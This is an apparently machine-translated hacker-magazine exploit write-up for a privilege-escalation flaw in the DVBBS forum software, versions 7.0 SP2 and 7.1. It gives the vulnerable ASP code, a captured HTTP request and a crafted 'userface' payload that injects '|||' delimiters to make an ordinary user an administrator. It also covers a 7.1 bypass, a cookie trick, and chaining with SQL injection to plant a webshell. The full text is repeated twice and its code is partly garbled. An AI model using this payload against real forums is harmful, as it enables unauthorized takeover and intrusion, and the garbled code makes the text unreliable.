I saw an article "The 7.1 vulnerability in Dynamic Network" on Black Defense in June, saying that there is a vulnerability in the admin_postings.asp file, but the prerequisite for exploitation is to have super moderator or front-end administrator permissions. I remembered that the mobile network version I discovered before had a foreground permission enhancement vulnerability, which can be used together. This foreground permission escalation vulnerability is valid for both the Access and SQL versions. Next, we will use 7.0 SP2 SQL version to explain the exploitation of this vulnerability.
Vulnerability Analysis:
We know that Dongwang judges the group where the current user is located through GroupID, and then judges the user's permissions through the group information. How did it get this GroupID? Let's look at the section where login verification is about 525 lines:
Rem ========== Forum login function============
Rem judging user login
Function ChkUserLogin(username,password,mobile,userCookies,ctype)
………The previous code is omitted
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace
,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,
userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,
UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday "
SQL=SQL+" From [Dv_User] Where "&SQLstr&""
set rsUser=(SQL)
If and Then
ChkUserLogin=false
Exit Function
Else
iMyUserInfo=(,1, "|||", "", "")
:Set rsUser = Nothing
End If
iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& &"|||"&
iMyUserInfo &"||||||DVBBS"
iMyUserInfo = Split(iMyUserInfo,"|||")
If trim(password)<>trim(iMyUserInfo(6)) Then
ChkUserLogin=false
ElseIf iMyUserInfo(17)=1 Then
ChkUserLogin=false
ElseIf iMyUserInfo(19)=5 Then
ChkUserLogin=false
Else
ChkUserLogin=True
Session( & "UserID") = iMyUserInfo
= iMyUserInfo(4)
RegName = iMyUserInfo(5)
Article = iMyUserInfo(8)
UserLastLogin = iMyUserInfo(15)
UserClass = iMyUserInfo(18)
GroupID = iMyUserInfo(19)
TitlePic = iMyUserInfo(34)
If Article<0 Then Article=0
End If
………The following code is omitted
It can be seen that Dongwang first connects the user's information with three vertical lines "|||" and passes it to iMyUserInfo as a string, and then iMyUserInfo is separated by "|||" into a string array. After the user password is verified correctly, assign the value of the 20th element of the array: iMyUserInfo(19) to the GroupID. See, GroupID is only the value of the 20th element corresponding to the array. If the value of iMyUserInfo(19) is 1, Dongwang will think that the user logged in now is the front-end administrator.
There is also a code to verify the user's identity in the Dv_ClsMain.asp file in the inc directory, which is used to detect the user's permissions after the user updates the information.
About 650 lines of Dv_ClsMain.asp
Public Sub TrueCheckUserLogin()
...The previous omission
Dim Rs,SQL
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,
UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,
UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,
UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
Set Rs = Execute(SQL)
If And Then
:Set Rs = Nothing
UserID = 0
EmptyCookies
LetGuestSession()
Else
MyUserInfo=(,1, "|||","","")
:Set Rs = Nothing
If IsArray(Session(CacheName & "UserID")) Then
MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
Else
MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
End IF
MyUserInfo
MyUserInfo = Split(MyUserInfo,"|||")
……
End If
End Sub
After the user login is successfully, use this function to read the user array and judge some common information
Public Sub GetCacheUserInfo()
MyUserInfo = Session(CacheName & "UserID")
UserID = Clng(MyUserInfo(4))
MemberName = MyUserInfo(5)
Lastlogin = MyUserInfo(15)
If Not IsDate(LastLogin) Then LastLogin = Now()
UserGroupID = Cint(MyUserInfo(19))
...The following code is omitted
The two test methods are exactly the same, so we can use either of these two to achieve our goals. Look at its SQL statement section:
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
The UserGroupID field ranks 16th. As long as the data in the previous field contains "|||", the position of the UserGroupID in the MyUserInfo string array will change. There are some special requirements for selecting this field. The field type must be appropriate and cannot be numeric. The length of the field must accommodate the array we constructed, and it must be the field in the above SQL statement before UserGroupID, so that the constructed array can change the position of UserGroupID in the original array. As shown in Figure 1.
All we can use is UserEmail and UserFace. Due to the existence of the IsValidEmail function, we cannot insert '|' into the UserEmail field, so the only thing that can be used is the UserFace field.
When modifying basic information, Dongwang only filtered a few symbols used for SQL injection, and did not filter out ‘|’. So as long as we construct the correct string, we can fool Dongwang and become a user of the administrator group.
face=Dv_FilterJS(replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
Vulnerability exploitation:
How to construct this UserFace to achieve our goals? At first I thought that as long as iMyUserInfo(19) was 1, I could be an administrator, but I never succeeded. In fact, when constructing this UserFace, we must also consider one thing. We have changed the structure of the iMyUserInfo array. We must ensure that the structure of the previous part of the new iMyUserInfo array is exactly the same as the original array structure, otherwise a type conversion error will occur. For example, UserBirthday, the value of the field position in the new array must be a date. We can directly take the second half of a normal iMyUserInfo to make our UserFace value, and then change the UserGroupID position to one. I modified the file to let it display the contents of the current user's iMyUserInfo when the user logs in, as shown in Figure 2.
For example, admin (it doesn't have to be admin, it's OK for other users, as long as the UserGroupID is changed to 1) the value of iMyUserInfo when logging in is:
DVBBS|||2005-6-1918:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||
eway@|||4|||1|||0||images/userface/||||32|||||2003-12-30 16:34:00|||2005-6-1918:04:06|||25|||0||| Administrator|||1||||||120|||115|||28|||0|||||||||||210.41.235.200
|||0|||0|||0||||||0||||||||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
We can get
images/userface/|||32||||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0||||| Administrator||||1|||||||120|||115|||28|||0|||||||||||||||||||||||DVBBS
To do our USBFace value, please note that the length of this value cannot exceed 255 characters. Dynamic Network limits the number of characters we submit to is 100, and we can submit it in NC.
Let’s test it on this machine first, use ordinary users to log in to the dynamic network, and now the user level is still a beginner.
OK, let's go to the place where we modify the basic information.
Submit, use WSE to grab this package
The intercepted packets are as follows:
POST /bs/?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/-excel, application/-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/ Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199 Content-Length: 396 Connection: Keep-Alive Cache-Control: no-cache Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM
title=&sex=1&face=Images%2Fuserface%&myface=Images%2Fuserface%&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2
OK, let's replace the userface value with
images/userface/|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||| Administrator|||1|||||||120|||115|||28||||0|||||||||||||||210.41.235.200||||0||||0||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
Note that the middle space is replaced by %20, recalculate the value of Content-Length, and submit it once with NC, and our userface will be replaced. Let's log in again now.
Haha, have you seen it? We are already administrators. Then use the vulnerabilities in the article "Dynamic Network 7.1 Vulnerabilities Appear in the World" in the sixth issue of Black Defense to add a background administrator.
Dynamic Network 7.1 usage method:
The method of using this vulnerability in version 7.1 of Dongwang has changed a little, and the difficulty is greater than that of 7.0 SP2. Version 7.1 has added filtering of the '|' symbol in the face variable
Near 270 lines in the file:
face=Dv_FilterJS(Replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
Unfortunately, the programmers of Dongwang are very secretive and forget to modify the avatar when registering, and there is no filtering of the face variables. Near 285 lines of the file.
If ("face")<>"" Then
face=("face")
End If
Similarly, it is better to catch the packet first and then submit it with NC. After registering and logging in, you will become the front desk administrator. But there is another problem, which is the Truepassword problem. 7.1 strengthens the prevention of cookie fraud, so this truepassword changes too frequently. In 7.0SP2, there is only one instruction to update the current user's turepassword:
7.0 SP2 files
An error occurred while processing SSI file
An error occurred while processing SSI file
<%
DVBBS.NewPassword0()
%>
In 7.1, it will also check whether the user's cookies are updated. 7. About 30 lines of the file
Check whether the write is successful, update the data if it is successful
If (Trim((DVBBS.Forum_sn)("password")))=TruePassWord Then
("UpDate [Dv_user] Set TruePassWord="&TruePassWord&" where UserID="&)
= TruePassWord
Dim iUserInfo
iUserInfo = Session( & "UserID")
iUserInfo(35) = TruePassWord
Session( & "UserID") = iUserInfo
End If
In 7.1, the truepassword in our client's cookies is updated to a new truepassword. Since the truepassword on the server is also obtained from MyUserInfo, the truepassword value in MyUserInfo will not change, and a dead loop will be formed during detection. Our solution is to use cookies to lock our cookies with the browser of Guilin Veterans. Previously, the truepassword value in the cookies must be set to be consistent with the truepassword value in MyUserInfo. This way, no repeated requests will enter the dead loop.
Since there is no SQL version of SQL on hand, the above was tested under Access version of 7.1 and can successfully become an administrator in the front desk.
postscript:
Methods to prevent vulnerabilities: The project of changing the database structure is a bit bigger. It is recommended to add the "|" symbol of the corresponding variable to filter, such as:
face=Dv_FilterJS(Replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
I would like to mention that Dongwang trusts the administrator in the background too much, so there is no prevention of SQL injection in many places in the background, which is like opening a door to SQL injection for us. A website we once tested was set up very BT. The DVBBS forum is used above. When we obtained the background administrator permission of DVBBS, we found that the upload directory did not have execution permissions, and the asp * was uploaded and returned as it was. The directory that executes the asp permissions does not have the permission to write. There are no other sites on the website to inject. Later I found out that after the DVBBS background was injected, I finally got a pony. It is a thousand-mile dike, which is broken by an ant hole.
In a trembling sentence, this permission-enhancing loophole does not have too profound skills, but the consequences are very serious. Since multiple pages managed by the foreground have SQL injection, this vulnerability is very harmful to the DVBBS SQL version. Please do not use the methods of this article to commit sabotage, otherwise you will be responsible for the consequences.
Vulnerability Analysis:
We know that Dongwang judges the group where the current user is located through GroupID, and then judges the user's permissions through the group information. How did it get this GroupID? Let's look at the section where login verification is about 525 lines:
Rem ========== Forum login function============
Rem judging user login
Function ChkUserLogin(username,password,mobile,userCookies,ctype)
………The previous code is omitted
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace
,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,
userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,
UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday "
SQL=SQL+" From [Dv_User] Where "&SQLstr&""
set rsUser=(SQL)
If and Then
ChkUserLogin=false
Exit Function
Else
iMyUserInfo=(,1, "|||", "", "")
:Set rsUser = Nothing
End If
iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& &"|||"&
iMyUserInfo &"||||||DVBBS"
iMyUserInfo = Split(iMyUserInfo,"|||")
If trim(password)<>trim(iMyUserInfo(6)) Then
ChkUserLogin=false
ElseIf iMyUserInfo(17)=1 Then
ChkUserLogin=false
ElseIf iMyUserInfo(19)=5 Then
ChkUserLogin=false
Else
ChkUserLogin=True
Session( & "UserID") = iMyUserInfo
= iMyUserInfo(4)
RegName = iMyUserInfo(5)
Article = iMyUserInfo(8)
UserLastLogin = iMyUserInfo(15)
UserClass = iMyUserInfo(18)
GroupID = iMyUserInfo(19)
TitlePic = iMyUserInfo(34)
If Article<0 Then Article=0
End If
………The following code is omitted
It can be seen that Dongwang first connects the user's information with three vertical lines "|||" and passes it to iMyUserInfo as a string, and then iMyUserInfo is separated by "|||" into a string array. After the user password is verified correctly, assign the value of the 20th element of the array: iMyUserInfo(19) to the GroupID. See, GroupID is only the value of the 20th element corresponding to the array. If the value of iMyUserInfo(19) is 1, Dongwang will think that the user logged in now is the front-end administrator.
There is also a code to verify the user's identity in the Dv_ClsMain.asp file in the inc directory, which is used to detect the user's permissions after the user updates the information.
About 650 lines of Dv_ClsMain.asp
Public Sub TrueCheckUserLogin()
...The previous omission
Dim Rs,SQL
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,
UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,
UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,
UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
Set Rs = Execute(SQL)
If And Then
:Set Rs = Nothing
UserID = 0
EmptyCookies
LetGuestSession()
Else
MyUserInfo=(,1, "|||","","")
:Set Rs = Nothing
If IsArray(Session(CacheName & "UserID")) Then
MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
Else
MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
End IF
MyUserInfo
MyUserInfo = Split(MyUserInfo,"|||")
……
End If
End Sub
After the user login is successfully, use this function to read the user array and judge some common information
Public Sub GetCacheUserInfo()
MyUserInfo = Session(CacheName & "UserID")
UserID = Clng(MyUserInfo(4))
MemberName = MyUserInfo(5)
Lastlogin = MyUserInfo(15)
If Not IsDate(LastLogin) Then LastLogin = Now()
UserGroupID = Cint(MyUserInfo(19))
...The following code is omitted
The two test methods are exactly the same, so we can use either of these two to achieve our goals. Look at its SQL statement section:
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
The UserGroupID field ranks 16th. As long as the data in the previous field contains "|||", the position of the UserGroupID in the MyUserInfo string array will change. There are some special requirements for selecting this field. The field type must be appropriate and cannot be numeric. The length of the field must accommodate the array we constructed, and it must be the field in the above SQL statement before UserGroupID, so that the constructed array can change the position of UserGroupID in the original array. As shown in Figure 1.
All we can use is UserEmail and UserFace. Due to the existence of the IsValidEmail function, we cannot insert '|' into the UserEmail field, so the only thing that can be used is the UserFace field.
When modifying basic information, Dongwang only filtered a few symbols used for SQL injection, and did not filter out ‘|’. So as long as we construct the correct string, we can fool Dongwang and become a user of the administrator group.
face=Dv_FilterJS(replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
Vulnerability exploitation:
How to construct this UserFace to achieve our goals? At first I thought that as long as iMyUserInfo(19) was 1, I could be an administrator, but I never succeeded. In fact, when constructing this UserFace, we must also consider one thing. We have changed the structure of the iMyUserInfo array. We must ensure that the structure of the previous part of the new iMyUserInfo array is exactly the same as the original array structure, otherwise a type conversion error will occur. For example, UserBirthday, the value of the field position in the new array must be a date. We can directly take the second half of a normal iMyUserInfo to make our UserFace value, and then change the UserGroupID position to one. I modified the file to let it display the contents of the current user's iMyUserInfo when the user logs in, as shown in Figure 2.
For example, admin (it doesn't have to be admin, it's OK for other users, as long as the UserGroupID is changed to 1) the value of iMyUserInfo when logging in is:
DVBBS|||2005-6-1918:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||
eway@|||4|||1|||0||images/userface/||||32|||||2003-12-30 16:34:00|||2005-6-1918:04:06|||25|||0||| Administrator|||1||||||120|||115|||28|||0|||||||||||210.41.235.200
|||0|||0|||0||||||0||||||||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
We can get
images/userface/|||32||||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0||||| Administrator||||1|||||||120|||115|||28|||0|||||||||||||||||||||||DVBBS
To do our USBFace value, please note that the length of this value cannot exceed 255 characters. Dynamic Network limits the number of characters we submit to is 100, and we can submit it in NC.
Let’s test it on this machine first, use ordinary users to log in to the dynamic network, and now the user level is still a beginner.
OK, let's go to the place where we modify the basic information.
Submit, use WSE to grab this package
The intercepted packets are as follows:
POST /bs/?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/-excel, application/-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/ Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199 Content-Length: 396 Connection: Keep-Alive Cache-Control: no-cache Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM
title=&sex=1&face=Images%2Fuserface%&myface=Images%2Fuserface%&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2
OK, let's replace the userface value with
images/userface/|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||| Administrator|||1|||||||120|||115|||28||||0|||||||||||||||210.41.235.200||||0||||0||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
Note that the middle space is replaced by %20, recalculate the value of Content-Length, and submit it once with NC, and our userface will be replaced. Let's log in again now.
Haha, have you seen it? We are already administrators. Then use the vulnerabilities in the article "Dynamic Network 7.1 Vulnerabilities Appear in the World" in the sixth issue of Black Defense to add a background administrator.
Dynamic Network 7.1 usage method:
The method of using this vulnerability in version 7.1 of Dongwang has changed a little, and the difficulty is greater than that of 7.0 SP2. Version 7.1 has added filtering of the '|' symbol in the face variable
Near 270 lines in the file:
face=Dv_FilterJS(Replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
Unfortunately, the programmers of Dongwang are very secretive and forget to modify the avatar when registering, and there is no filtering of the face variables. Near 285 lines of the file.
If ("face")<>"" Then
face=("face")
End If
Similarly, it is better to catch the packet first and then submit it with NC. After registering and logging in, you will become the front desk administrator. But there is another problem, which is the Truepassword problem. 7.1 strengthens the prevention of cookie fraud, so this truepassword changes too frequently. In 7.0SP2, there is only one instruction to update the current user's turepassword:
7.0 SP2 files
An error occurred while processing SSI file
An error occurred while processing SSI file
<%
DVBBS.NewPassword0()
%>
In 7.1, it will also check whether the user's cookies are updated. 7. About 30 lines of the file
Check whether the write is successful, update the data if it is successful
If (Trim((DVBBS.Forum_sn)("password")))=TruePassWord Then
("UpDate [Dv_user] Set TruePassWord="&TruePassWord&" where UserID="&)
= TruePassWord
Dim iUserInfo
iUserInfo = Session( & "UserID")
iUserInfo(35) = TruePassWord
Session( & "UserID") = iUserInfo
End If
In 7.1, the truepassword in our client's cookies is updated to a new truepassword. Since the truepassword on the server is also obtained from MyUserInfo, the truepassword value in MyUserInfo will not change, and a dead loop will be formed during detection. Our solution is to use cookies to lock our cookies with the browser of Guilin Veterans. Previously, the truepassword value in the cookies must be set to be consistent with the truepassword value in MyUserInfo. This way, no repeated requests will enter the dead loop.
Since there is no SQL version of SQL on hand, the above was tested under Access version of 7.1 and can successfully become an administrator in the front desk.
postscript:
Methods to prevent vulnerabilities: The project of changing the database structure is a bit bigger. It is recommended to add the "|" symbol of the corresponding variable to filter, such as:
face=Dv_FilterJS(Replace(face,"",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
I would like to mention that Dongwang trusts the administrator in the background too much, so there is no prevention of SQL injection in many places in the background, which is like opening a door to SQL injection for us. A website we once tested was set up very BT. The DVBBS forum is used above. When we obtained the background administrator permission of DVBBS, we found that the upload directory did not have execution permissions, and the asp * was uploaded and returned as it was. The directory that executes the asp permissions does not have the permission to write. There are no other sites on the website to inject. Later I found out that after the DVBBS background was injected, I finally got a pony. It is a thousand-mile dike, which is broken by an ant hole.
In a trembling sentence, this permission-enhancing loophole does not have too profound skills, but the consequences are very serious. Since multiple pages managed by the foreground have SQL injection, this vulnerability is very harmful to the DVBBS SQL version. Please do not use the methods of this article to commit sabotage, otherwise you will be responsible for the consequences.